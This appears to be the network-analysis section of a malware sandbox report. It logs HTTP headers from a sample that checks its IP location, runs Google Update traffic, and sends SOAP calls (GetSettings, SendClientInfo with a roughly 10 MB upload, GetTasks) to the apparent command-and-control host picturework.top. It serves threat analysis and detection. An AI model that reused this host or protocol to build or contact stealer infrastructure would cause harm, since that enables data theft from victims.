Network Analysis

GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 22 Mar 2021 01:27:15 GMT Content-Type: application/json; charset=utf-8 Content-Length: 349 Connection: keep-alive Set-Cookie: __cfduid=d060d2c1fea6f91681743a415850665921616376435; expires=Wed, 21-Apr-21 01:27:15 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: no-cache Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC cf-request-id: 08f9242a8e0000051faf8ab000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RQXSUOpWbaUlhjJWwwX6vhQ2EGJmHkcJLi4p8v76lk%2FKB1wzNwyewIZiBO0BqTAijP%2Bk9cnbOIqcsZmk1oI3VzY9DYHyXFugWfM%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 633ba2f0edb6051f-LAX

POST /service/update2?cup2key=10:4230926761&cup2hreq=54883cade0ed38d56a1f9540f8d2bc8aa67fac2351aa803d4e909eeec3ddc91d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa X-Old-UID: cnt=0 X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96} X-Goog-Update-Updater: Omaha-1.3.36.32 X-Goog-Update-Interactivity: bg X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Content-Length: 1202 Host: update.googleapis.com

HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-fIkhNfJrcETs08xdCm6v9Q' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 22 Mar 2021 01:27:20 GMT X-Cup-Server-Proof: 3046022100c2bbff5649d3c42161913627a66180e64c58c798d076e3b731bd9b938b8b4ff5022100e16e58b9ce003ee7b46ab36438edb15d2478885b9808ff9b33683f5c1b289689:54883cade0ed38d56a1f9540f8d2bc8aa67fac2351aa803d4e909eeec3ddc91d Content-Type: text/xml; charset=UTF-8 X-Daynum: 5193 X-Daystart: 66440 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings" Host: picturework.top Content-Length: 136 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive

HTTP/1.1 200 OK Content-Length: 1174 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 22 Mar 2021 01:27:14 GMT Connection: close

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo" Host: picturework.top Content-Length: 10198747 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 22 Mar 2021 01:27:30 GMT Connection: close

HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 200 OK accept-ranges: bytes content-disposition: attachment content-length: 1304160 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 22 Mar 2021 01:23:49 GMT age: 213 cache-control: public,max-age=3600

POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks" Host: picturework.top Content-Length: 1643 Expect: 100-continue Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK Content-Length: 250 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 22 Mar 2021 01:27:30 GMT Connection: close

GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT Range: bytes=0-4935 User-Agent: Microsoft BITS/7.5 X-Old-UID: cnt=0 X-Last-HR: 0x0 X-Last-HTTP-Status-Code: 0 X-Retry-Count: 0 X-HTTP-Attempts: 1 Host: edgedl.gvt1.com

HTTP/1.1 206 Partial Content accept-ranges: bytes content-disposition: attachment content-length: 4936 content-security-policy: default-src 'none' content-type: application/octet-stream etag: "8346e1" last-modified: Fri, 22 Jan 2021 06:31:14 GMT server: Google-Edge-Cache x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 0 date: Mon, 22 Mar 2021 01:23:49 GMT age: 223 content-range: bytes 0-4935/1304160 cache-control: public,max-age=3600